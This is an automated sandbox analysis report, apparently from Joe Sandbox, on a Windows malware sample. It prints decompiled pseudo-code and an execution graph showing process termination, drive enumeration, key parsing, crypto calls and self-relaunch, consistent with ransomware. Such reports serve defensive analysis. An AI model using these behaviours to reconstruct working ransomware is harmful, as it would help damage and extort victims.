                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x00406810
                                      0x00406810
                                      0x00406823
                                      0x0040682e
                                      0x0040683c

                                      APIs
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 2032009209-0
                                      • Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
                                      • Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
                                      • Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403190(char _a4) {
                                      				char _t6;
                                      				CHAR* _t13;
                                      				CHAR* _t16;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t13 =  *_t1;
                                      				_t16 = _t13;
                                      				if( *_t13 == 0) {
                                      					L5:
                                      					lstrcmpiA(_t13, "mask");
                                      					_t2 =  &_a4; // 0x405135
                                      					_t10 =  ==  ? 1 : 0;
                                      					lstrcmpiA( *_t2, "pub_key");
                                      					 *_t16 = 0x3d;
                                      					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                      					return  ==  ? 2 :  ==  ? 1 : 0;
                                      				} else {
                                      					while(1) {
                                      						_t6 =  *_t16;
                                      						if(_t6 == 0x7d) {
                                      							break;
                                      						}
                                      						if(_t6 == 0x3d) {
                                      							 *_t16 = 0;
                                      							goto L5;
                                      						} else {
                                      							_t16 =  &(_t16[1]);
                                      							if( *_t16 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L5;
                                      							}
                                      						}
                                      						goto L8;
                                      					}
                                      					return 0;
                                      				}
                                      				L8:
                                      			}






                                      0x00403193
                                      0x00403193
                                      0x00403197
                                      0x0040319c
                                      0x004031b0
                                      0x004031b9
                                      0x004031c4
                                      0x004031ce
                                      0x004031d1
                                      0x004031d9
                                      0x004031e1
                                      0x004031e4
                                      0x004031e9
                                      0x004031a0
                                      0x004031a0
                                      0x004031a0
                                      0x004031a4
                                      0x00000000
                                      0x00000000
                                      0x004031a8
                                      0x004031ec
                                      0x00000000
                                      0x004031aa
                                      0x004031aa
                                      0x004031ae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031ae
                                      0x00000000
                                      0x004031a8
                                      0x004031f5
                                      0x004031f5
                                      0x00000000

                                      APIs
                                      • lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
                                      • lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID: 5Q@$5Q@$mask$pub_key
                                      • API String ID: 1586166983-363831109
                                      • Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
                                      • Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
                                      • Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 00403B32
                                      • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                      • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                      • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion_memset
                                      • String ID:
                                      • API String ID: 3299124433-0
                                      • Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
                                      • Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
                                      • Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                      				CHAR* _v8;
                                      				char _v12;
                                      				char _v20;
                                      				char _t16;
                                      				char _t20;
                                      				char _t21;
                                      				intOrPtr* _t24;
                                      				intOrPtr _t25;
                                      				intOrPtr _t26;
                                      				intOrPtr* _t29;
                                      				CHAR* _t33;
                                      				intOrPtr _t34;
                                      				intOrPtr _t35;
                                      				void* _t38;
                                      				void* _t41;
                                      				intOrPtr* _t42;
                                      				void* _t47;
                                      				void* _t49;
                                      				intOrPtr* _t51;
                                      				CHAR* _t53;
                                      
                                      				asm("movq xmm0, [0x40ff2c]");
                                      				_t16 =  *0x40ff34; // 0x0
                                      				_t29 = _a4;
                                      				_v8 = __edx;
                                      				_t51 = __ecx;
                                      				asm("movq [ebp-0x10], xmm0");
                                      				_v12 = _t16;
                                      				if( *_t29 == 0) {
                                      					L11:
                                      					if(_t51 == 0) {
                                      						goto L10;
                                      					} else {
                                      						if(_v20 == 0) {
                                      							L22:
                                      							if(_t51 == 0) {
                                      								goto L10;
                                      							} else {
                                      								_t53 = _t51 + lstrlenA( &_v20);
                                      								while(1) {
                                      									_t20 =  *_t53;
                                      									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                      										break;
                                      									}
                                      									_t53 =  &(_t53[1]);
                                      								}
                                      								_t33 = _t53;
                                      								while(1) {
                                      									_t21 =  *_t33;
                                      									if(_t21 < 0x30 || _t21 > 0x39) {
                                      										goto L30;
                                      									}
                                      									L31:
                                      									_t33 =  &(_t33[1]);
                                      									continue;
                                      									L30:
                                      									if(_t21 == 0x2e) {
                                      										goto L31;
                                      									}
                                      									 *_t33 = 0;
                                      									return lstrcpyA(_v8, _t53);
                                      									goto L33;
                                      								}
                                      							}
                                      						} else {
                                      							_t34 =  *_t51;
                                      							if(_t34 != 0) {
                                      								_t47 = _t51 -  &_v20;
                                      								do {
                                      									_t24 =  &_v20;
                                      									if(_t34 == 0) {
                                      										L19:
                                      										if( *_t24 == 0) {
                                      											goto L22;
                                      										} else {
                                      											goto L20;
                                      										}
                                      									} else {
                                      										while(1) {
                                      											_t35 =  *_t24;
                                      											if(_t35 == 0) {
                                      												goto L22;
                                      											}
                                      											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                      											if(_t41 != 0) {
                                      												goto L19;
                                      											} else {
                                      												_t24 = _t24 + 1;
                                      												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                      													continue;
                                      												} else {
                                      													goto L19;
                                      												}
                                      											}
                                      											goto L33;
                                      										}
                                      										goto L22;
                                      									}
                                      									goto L33;
                                      									L20:
                                      									_t34 =  *((intOrPtr*)(_t51 + 1));
                                      									_t51 = _t51 + 1;
                                      									_t47 = _t47 + 1;
                                      								} while (_t34 != 0);
                                      							}
                                      							goto L10;
                                      						}
                                      					}
                                      				} else {
                                      					_t25 =  *__ecx;
                                      					if(_t25 == 0) {
                                      						L10:
                                      						return lstrcpyA(_v8, "fabian wosar <3");
                                      					} else {
                                      						_t49 = __ecx - _t29;
                                      						do {
                                      							_t42 = _t29;
                                      							if(_t25 == 0) {
                                      								L8:
                                      								if( *_t42 == 0) {
                                      									goto L11;
                                      								} else {
                                      									goto L9;
                                      								}
                                      							} else {
                                      								while(1) {
                                      									_t26 =  *_t42;
                                      									if(_t26 == 0) {
                                      										goto L11;
                                      									}
                                      									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                      									if(_t38 != 0) {
                                      										goto L8;
                                      									} else {
                                      										_t42 = _t42 + 1;
                                      										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                      											continue;
                                      										} else {
                                      											goto L8;
                                      										}
                                      									}
                                      									goto L33;
                                      								}
                                      								goto L11;
                                      							}
                                      							goto L33;
                                      							L9:
                                      							_t25 =  *((intOrPtr*)(_t51 + 1));
                                      							_t51 = _t51 + 1;
                                      							_t49 = _t49 + 1;
                                      						} while (_t25 != 0);
                                      						goto L10;
                                      					}
                                      				}
                                      				L33:
                                      			}























                                      0x00404ba6
                                      0x00404bae
                                      0x00404bb4
                                      0x00404bb9
                                      0x00404bbc
                                      0x00404bc1
                                      0x00404bc6
                                      0x00404bc9
                                      0x00404c1a
                                      0x00404c1c
                                      0x00000000
                                      0x00404c1e
                                      0x00404c22
                                      0x00404c5f
                                      0x00404c61
                                      0x00000000
                                      0x00404c63
                                      0x00404c6d
                                      0x00404c70
                                      0x00404c70
                                      0x00404c74
                                      0x00000000
                                      0x00000000
                                      0x00404c7a
                                      0x00404c7a
                                      0x00404c7d
                                      0x00404c80
                                      0x00404c80
                                      0x00404c84
                                      0x00000000
                                      0x00000000
                                      0x00404c8e
                                      0x00404c8e
                                      0x00000000
                                      0x00404c8a
                                      0x00404c8c
                                      0x00000000
                                      0x00000000
                                      0x00404c95
                                      0x00404ca4
                                      0x00000000
                                      0x00404ca4
                                      0x00404c80
                                      0x00404c24
                                      0x00404c24
                                      0x00404c28
                                      0x00404c2f
                                      0x00404c31
                                      0x00404c31
                                      0x00404c36
                                      0x00404c4f
                                      0x00404c52
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c38
                                      0x00404c38
                                      0x00404c38
                                      0x00404c3c
                                      0x00000000
                                      0x00000000
                                      0x00404c45
                                      0x00404c47
                                      0x00000000
                                      0x00404c49
                                      0x00404c49
                                      0x00404c4d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c4d
                                      0x00000000
                                      0x00404c47
                                      0x00000000
                                      0x00404c38
                                      0x00000000
                                      0x00404c54
                                      0x00404c54
                                      0x00404c57
                                      0x00404c58
                                      0x00404c59
                                      0x00404c5d
                                      0x00000000
                                      0x00404c28
                                      0x00404c22
                                      0x00404bcb
                                      0x00404bcb
                                      0x00404bcf
                                      0x00404c05
                                      0x00404c19
                                      0x00404bd1
                                      0x00404bd3
                                      0x00404bd5
                                      0x00404bd5
                                      0x00404bd9
                                      0x00404bf7
                                      0x00404bfa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bdb
                                      0x00404be0
                                      0x00404be0
                                      0x00404be4
                                      0x00000000
                                      0x00000000
                                      0x00404bed
                                      0x00404bef
                                      0x00000000
                                      0x00404bf1
                                      0x00404bf1
                                      0x00404bf5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404bf5
                                      0x00000000
                                      0x00404bef
                                      0x00000000
                                      0x00404be0
                                      0x00000000
                                      0x00404bfc
                                      0x00404bfc
                                      0x00404bff
                                      0x00404c00
                                      0x00404c01
                                      0x00000000
                                      0x00404bd5
                                      0x00404bcf
                                      0x00000000

                                      APIs
                                      • lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
                                      • lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
                                      • lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID: fabian wosar <3
                                      • API String ID: 367037083-1724090804
                                      • Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
                                      • Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
                                      • Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:6.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:710
                                      Total number of Limit Nodes:10
                                      execution_graph 1608 404af0 1611 4048a0 Sleep 1608->1611 1654 404550 1611->1654 1614 4048c2 CreateThread 1616 4048e0 WaitForSingleObject 1614->1616 1617 40490c 1614->1617 1615 4048ba ExitProcess 1618 404902 CloseHandle 1616->1618 1619 4048f6 TerminateThread 1616->1619 1670 404640 CreateToolhelp32Snapshot VirtualAlloc 1617->1670 1618->1617 1619->1618 1621 404911 1681 4040a0 1621->1681 1625 40491e 1626 40496c ExitProcess 1625->1626 1627 404974 1625->1627 1628 4049ae 1627->1628 1632 404998 Sleep 1627->1632 1704 405750 1627->1704 1630 404a21 1628->1630 1631 4049d8 lstrlenA VirtualAlloc CryptStringToBinaryA 1628->1631 1748 403ff0 1630->1748 1631->1630 1633 404a19 ExitProcess 1631->1633 1632->1627 1635 404a2d InitializeCriticalSection 1636 404a4b 1635->1636 1637 404a3e 1635->1637 1757 403de0 VirtualAlloc GetTickCount 1636->1757 1751 403fc0 1637->1751 1641 404a53 DeleteCriticalSection 1765 403a60 AllocateAndInitializeSid 1641->1765 1643 404a63 1644 404a6c VirtualAlloc 1643->1644 1769 404330 1643->1769 1646 404ab3 1644->1646 1647 404a89 GetModuleFileNameW 1644->1647 1649 404ad6 1646->1649 1650 404abc ShellExecuteW 1646->1650 1776 403ba0 1647->1776 1787 405fc0 VirtualFree VirtualFree 1649->1787 1650->1649 1653 404ade ExitProcess 1788 4039b0 GetProcessHeap 1654->1788 1656 404587 1789 406d90 1656->1789 1660 404599 VirtualAlloc 1661 4045b8 lstrcpyW lstrlenW 1660->1661 1881 4069a0 1661->1881 1664 4045e9 CreateMutexW GetLastError 1665 404601 GetLastError 1664->1665 1666 40460a VirtualFree 1664->1666 1665->1666 1907 407720 1666->1907 1671 4047d8 1670->1671 1674 4047eb 1670->1674 1672 4047e3 Process32FirstW 1671->1672 1671->1674 1672->1674 1673 404800 lstrcmpiW 1673->1674 1675 40480f OpenProcess 1673->1675 1674->1673 1677 404844 Process32NextW 1674->1677 1675->1674 1676 404821 TerminateProcess CloseHandle 1675->1676 1676->1674 1677->1674 1678 404857 1677->1678 1679 404869 CloseHandle 1678->1679 1680 40485b VirtualFree 1678->1680 1679->1621 1680->1679 1682 4040bb 1681->1682 1683 40431c 1681->1683 1979 4039b0 GetProcessHeap 1682->1979 1701 405ef0 VirtualAlloc VirtualAlloc 1683->1701 1685 4040e6 1686 406d90 105 API calls 1685->1686 1687 4040ef 1686->1687 1688 406ba0 16 API calls 1687->1688 1689 4040f8 VirtualAlloc 1688->1689 1690 404119 1689->1690 1691 4069a0 49 API calls 1690->1691 1692 404134 1691->1692 1693 404140 lstrlenW 1692->1693 1700 404170 1693->1700 1694 404236 1696 4042d1 VirtualAlloc 1694->1696 1697 404302 VirtualFree 1694->1697 1695 4041c0 lstrcpyW lstrlenW 1695->1694 1695->1700 1696->1697 1698 4042ed wsprintfW 1696->1698 1699 407720 10 API calls 1697->1699 1698->1697 1699->1683 1700->1694 1700->1695 1980 405d80 CryptAcquireContextW 1701->1980 1988 4039b0 GetProcessHeap 1704->1988 1706 405794 1707 406d90 105 API calls 1706->1707 1708 40579d 1707->1708 1709 406ba0 16 API calls 1708->1709 1710 4057a6 VirtualAlloc 1709->1710 1711 4057de 1710->1711 1712 405c14 1711->1712 1713 40584b 6 API calls 1711->1713 1716 405c1f VirtualFree 1712->1716 1714 4058ca lstrlenA 1713->1714 1717 4058f2 lstrlenA 1714->1717 1718 407720 10 API calls 1716->1718 1721 405942 lstrlenA 1717->1721 1725 40590e lstrlenA 1717->1725 1720 405c35 1718->1720 1720->1627 1722 405971 lstrcatW lstrlenW 1721->1722 1729 40594b lstrlenA 1721->1729 1724 4069a0 49 API calls 1722->1724 1728 405999 12 API calls 1724->1728 1726 40593e 1725->1726 1726->1721 1730 405a3a lstrlenW 1728->1730 1729->1722 1989 408b30 1730->1989 1733 405a9c lstrlenA 1734 405abd 1733->1734 1735 405ad4 CryptBinaryToStringA 1734->1735 1736 405b00 GetLastError 1735->1736 1737 405b06 lstrlenA VirtualAlloc lstrlenA 1735->1737 1736->1737 1738 405b2e lstrlenA 1737->1738 1740 405b6e lstrlenA MultiByteToWideChar 1738->1740 1744 405b47 lstrlenA 1738->1744 1991 405370 1740->1991 1744->1740 1745 405ba6 VirtualFree VirtualFree VirtualFree 1745->1716 1746 405bd7 VirtualFree VirtualFree VirtualFree 1746->1712 1749 403ffd VirtualAlloc 1748->1749 1750 404018 1748->1750 1749->1750 1750->1635 1750->1750 1752 403fd4 1751->1752 1753 403de0 290 API calls 1752->1753 1754 403fdc 1753->1754 2118 405fc0 VirtualFree VirtualFree 1754->2118 1756 403fe4 1756->1641 1758 403e40 GetDriveTypeW 1757->1758 1759 403e55 1758->1759 1759->1758 1760 403e5a CreateThread 1759->1760 1761 403e9e WaitForMultipleObjects GetTickCount 1759->1761 1760->1759 1762 403eff 1761->1762 1762->1762 2119 405540 VirtualAlloc 1762->2119 1764 403fad 1764->1641 1766 403a9a 1765->1766 1767 403a9e GetModuleHandleA GetProcAddress 1765->1767 1766->1643 1768 403ac0 FreeSid 1767->1768 1768->1643 2146 403ae0 1769->2146 1771 404344 VirtualAlloc 1773 4044fb 1771->1773 1774 4044ff GetSystemDirectoryW lstrcatW ShellExecuteW 1771->1774 1775 40452f VirtualFree 1773->1775 1774->1775 1775->1644 1777 403ae0 4 API calls 1776->1777 1778 403bb6 1777->1778 1779 403dba VirtualFree 1778->1779 1780 403a60 4 API calls 1778->1780 1779->1646 1781 403bc3 1780->1781 1781->1779 1782 403bcb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1781->1782 1783 403da0 ShellExecuteExW 1782->1783 1784 403dc1 WaitForSingleObject CloseHandle ExitProcess 1783->1784 1785 403da7 1783->1785 1785->1783 1786 403dad VirtualFree 1785->1786 1786->1779 1787->1653 1788->1656 1790 406da9 VirtualAlloc GetUserNameW 1789->1790 1791 406dce 1789->1791 1790->1791 1792 406dd4 VirtualAlloc GetComputerNameW 1791->1792 1793 406df6 1791->1793 1792->1793 1794 406e02 VirtualAlloc 1793->1794 1795 406e56 1793->1795 1794->1795 1796 406e19 1794->1796 1797 406e60 VirtualAlloc RegOpenKeyExW 1795->1797 1798 406ef5 1795->1798 1928 406d10 RegOpenKeyExW 1796->1928 1802 406e9c RegQueryValueExW 1797->1802 1803 406ede VirtualFree 1797->1803 1799 407024 1798->1799 1800 406eff VirtualAlloc VirtualAlloc 1798->1800 1804 4070d6 1799->1804 1805 40702e VirtualAlloc RegOpenKeyExW 1799->1805 1806 406f40 wsprintfW RegOpenKeyExW 1800->1806 1808 406ec0 1802->1808 1809 406ec9 GetLastError 1802->1809 1803->1798 1813 407134 1804->1813 1814 4070dc GetNativeSystemInfo VirtualAlloc 1804->1814 1810 40706a RegQueryValueExW 1805->1810 1811 4070ac 1805->1811 1812 406f75 RegQueryValueExW 1806->1812 1819 406f97 1806->1819 1807 406e34 1807->1795 1823 406e51 wsprintfW 1807->1823 1815 406ecf RegCloseKey 1808->1815 1809->1815 1816 407097 GetLastError 1810->1816 1817 40708e 1810->1817 1822 406d10 5 API calls 1811->1822 1818 406fa0 GetLastError 1812->1818 1812->1819 1820 407155 1813->1820 1821 40713a 1813->1821 1824 4070ff wsprintfW 1814->1824 1815->1798 1815->1803 1826 40709d RegCloseKey 1816->1826 1817->1826 1827 406fa6 RegCloseKey 1818->1827 1819->1806 1819->1827 1835 406ffd 1819->1835 1829 4072e9 1820->1829 1830 40715f VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 1820->1830 1933 407520 VirtualAlloc VirtualAlloc 1821->1933 1831 4070c9 wsprintfW 1822->1831 1823->1795 1824->1813 1826->1804 1826->1811 1827->1819 1832 406fb5 lstrcmpiW 1827->1832 1840 4074a0 1829->1840 1841 4072f9 VirtualAlloc 1829->1841 1833 407200 RegQueryValueExW 1830->1833 1834 40726d wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1830->1834 1831->1804 1832->1819 1839 406fc7 wsprintfW 1832->1839 1842 407225 1833->1842 1843 40722e GetLastError 1833->1843 1836 4072c2 VirtualFree 1834->1836 1837 4072ab lstrlenW 1834->1837 1844 407001 wsprintfW 1835->1844 1845 40700e VirtualFree 1835->1845 1836->1829 1837->1836 1838 40714e 1838->1820 1839->1819 1846 4074a9 VirtualAlloc 1840->1846 1847 404590 1840->1847 1861 407345 1841->1861 1849 407234 RegCloseKey 1842->1849 1843->1849 1844->1845 1845->1799 1850 4074e4 1846->1850 1851 4074c7 1846->1851 1863 406ba0 1847->1863 1849->1834 1852 407243 lstrlenW 1849->1852 1850->1847 1951 4068f0 1851->1951 1855 406d10 5 API calls 1852->1855 1854 407370 GetDriveTypeW 1854->1861 1855->1834 1857 4074d2 VirtualFree 1857->1850 1858 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1860 407471 lstrcatW 1858->1860 1858->1861 1859 407491 lstrlenW 1859->1840 1860->1861 1861->1854 1861->1858 1861->1859 1862 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1861->1862 1862->1861 1866 406bb0 1863->1866 1864 406c0a 1867 406c10 lstrlenW lstrlenW 1864->1867 1868 406c2b 1864->1868 1865 406bef lstrlenW lstrlenW 1865->1864 1866->1864 1866->1865 1867->1868 1869 406c31 lstrlenW lstrlenW 1868->1869 1870 406c4c 1868->1870 1869->1870 1871 406c52 lstrlenW lstrlenW 1870->1871 1872 406c6d 1870->1872 1871->1872 1873 406c73 lstrlenW lstrlenW 1872->1873 1874 406c8e 1872->1874 1873->1874 1875 406c94 lstrlenW lstrlenW 1874->1875 1876 406caf 1874->1876 1875->1876 1877 406cd9 1876->1877 1878 406cbe lstrlenW lstrlenW 1876->1878 1879 406ce2 lstrlenW lstrlenW 1877->1879 1880 406d07 1877->1880 1878->1877 1879->1660 1880->1660 1882 4069ba lstrcatW lstrcatW lstrcatW lstrcatW 1881->1882 1883 4069dc 1881->1883 1882->1883 1884 4069e1 lstrcatW lstrcatW lstrcatW lstrcatW 1883->1884 1885 4069fd 1883->1885 1884->1885 1886 406a03 lstrcatW lstrcatW lstrcatW lstrcatW 1885->1886 1887 406a1f 1885->1887 1886->1887 1888 406a41 1887->1888 1889 406a25 lstrcatW lstrcatW lstrcatW lstrcatW 1887->1889 1890 406a63 1888->1890 1891 406a47 lstrcatW lstrcatW lstrcatW lstrcatW 1888->1891 1889->1888 1892 406a85 1890->1892 1893 406a69 lstrcatW lstrcatW lstrcatW lstrcatW 1890->1893 1891->1890 1894 406aa7 1892->1894 1895 406a8b lstrcatW lstrcatW lstrcatW lstrcatW 1892->1895 1893->1892 1896 406ac9 1894->1896 1897 406aad lstrcatW lstrcatW lstrcatW lstrcatW 1894->1897 1895->1894 1898 406aeb 1896->1898 1899 406acf lstrcatW lstrcatW lstrcatW lstrcatW 1896->1899 1897->1896 1900 406af1 VirtualAlloc 1898->1900 1901 406b5c 1898->1901 1899->1898 1902 406b21 wsprintfW 1900->1902 1903 406b0c wsprintfW 1900->1903 1904 406b62 lstrcatW lstrcatW lstrcatW lstrcatW 1901->1904 1905 406b7e lstrlenW 1901->1905 1906 406b30 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1902->1906 1903->1906 1904->1905 1905->1664 1906->1901 1908 40773b 1907->1908 1909 40772f VirtualFree 1907->1909 1910 407741 VirtualFree 1908->1910 1911 40774d 1908->1911 1909->1908 1910->1911 1912 407753 VirtualFree 1911->1912 1913 40775f 1911->1913 1912->1913 1914 407771 1913->1914 1915 407765 VirtualFree 1913->1915 1916 407783 1914->1916 1917 407777 VirtualFree 1914->1917 1915->1914 1918 407795 1916->1918 1919 407789 VirtualFree 1916->1919 1917->1916 1920 4077a7 1918->1920 1921 40779b VirtualFree 1918->1921 1919->1918 1922 4077b9 1920->1922 1923 4077ad VirtualFree 1920->1923 1921->1920 1924 4077cb 1922->1924 1925 4077bf VirtualFree 1922->1925 1923->1922 1926 40462a 1924->1926 1927 4077d4 VirtualFree 1924->1927 1925->1924 1926->1614 1926->1615 1927->1926 1929 406d32 RegQueryValueExW 1928->1929 1930 406d7e 1928->1930 1931 406d51 RegCloseKey 1929->1931 1932 406d66 GetLastError RegCloseKey 1929->1932 1930->1807 1931->1807 1932->1807 1934 4075e2 1933->1934 1935 4075bc CreateToolhelp32Snapshot 1933->1935 1934->1838 1936 4075d4 VirtualFree 1935->1936 1937 4075ed Process32FirstW 1935->1937 1936->1934 1938 4076dd VirtualFree CloseHandle 1937->1938 1945 40760d 1937->1945 1939 407707 1938->1939 1940 4076fd VirtualFree 1938->1940 1939->1838 1940->1939 1941 4076b7 1943 4076d5 1941->1943 1944 4076c5 lstrlenW 1941->1944 1942 407620 lstrcmpiW 1942->1945 1943->1938 1944->1943 